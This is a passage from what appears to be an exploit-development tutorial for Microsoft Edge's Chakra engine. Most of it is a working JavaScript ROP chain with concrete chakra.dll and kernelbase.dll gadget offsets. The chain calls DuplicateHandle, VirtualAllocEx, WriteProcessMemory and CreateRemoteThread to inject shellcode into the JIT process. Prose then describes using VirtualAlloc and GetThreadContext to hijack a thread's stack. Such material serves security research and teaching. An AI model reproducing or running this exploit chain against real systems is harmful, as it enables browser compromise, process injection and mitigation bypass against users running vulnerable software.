write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

This call is pretty straight forward, and since there are only four parameters we don’t have to write any parameters to the stack.

We start out with the flProtect parameter (again we have to make sure RAX is writable because of a gadget when performs cmp r8d, [rax]). We can set a breakpoint on jmp rax, as we have seen, to reach our first gadget within the VirtualAlloc ROP chain.

The first parameter we are going to start with flProtect parameter, which we will set to 4, or PAGE_READWRITE.

Our call to VirtualAlloc is now in this state:

	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it

The next parameter we will address is lpAddress - which we will set to NULL.

This brings our call to the following state:

	NULL,				// Let the system decide where to allocate the memory
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it

Next up is our dwSize parameter. We showed earlier how to calculate the size of a CONTEXT structure, and so we will use a value of 0x4d0.

This brings us to the following state - with only one more parameter to deal with:

	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it

The last parameter we need to set is flAllocationType, which will be a value of 0x3000.

This completes our parameters:

	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it

Lastly, we execute our function call and the return value should be to a block of memory which we will use in our call to GetThreadContext.

As part of our next ROP chain, calling GetThreadContext, we will preserve this address as we need to write a value into it before we make our call to GetThreadContext.

GetThreadContext ROP Chain

As mentioned earlier, we want to inject one last item into the JIT process, now that our shellcode is there, and that is a final ROP chain that will mark our shellcode as RWX. As we know, with ROP, we need to have stack control in order to have ROP work, as each gadget performs a return to the stack, and we need to control what each gadget returns back into (our next ROP gadget). So, since we have already controlled a thread (by creating one) in the remote JIT process, we can use the Windows API GetThreadContext to dump the CPU register state of our thread, which includes the RSP register, or the stack pointer. In other words, GetThreadContext allows us, by nature, to leak the stack from a thread in any process which a user has access to via a handle to a thread within said process. Luckily for us, as mentioned, CreateRemoteThread returned a handle to us - meaning we have a handle to a thread within the JIT process that we control.

However, let’s quickly look at GetThreadContext and its documentation, specifically the lpContext parameter:

A pointer to a CONTEXT structure (such as ARM64_NT_CONTEXT) that receives the appropriate context of the specified thread. The value of the ContextFlags member of this structure specifies which portions of a thread’s context are retrieved. The CONTEXT structure is highly processor specific. Refer to the WinNT.h header file for processor-specific definitions of this structures and any alignment requirements.

As we can see, it is a slight misnomer to say that we only need to supply GetThreadContext with an empty buffer to fill. When calling GetThreadContext, one needs to fill in CONTEXT.ContextFlags in order to tell the OS how much of the thread’s context (e.g. CPU register state) we would like to receive. In our case, we want to retrieve all of the registers back (a full 0x4d0 CONTEXT structure).

Taking a look at ReactOS we can see the possible values we can supply here:

If we add all of these values together to retrieve CONTEXT_ALL, we can see we get a value of 0x10001f. This means that when we call GetThreadContext, before the call, we need to set our CONTEXT structure (which is really our VirtualAlloc allocation address) to 0x10001f in the ContextFlags structure.

Looking at WinDbg, this value is located at CONTEXT + 0x30.

This means that before we call GetThreadContext, we need to write to our buffer, which we allocated with VirtualAlloc (we will pass this into GetThreadContext to act as our β€œCONTEXT” structure), the value 0x10001f at an offset of 0x30 within this buffer. Here is how this looks:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure

Let’s see how all of this looks via ROP (with previous chains for continuity):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
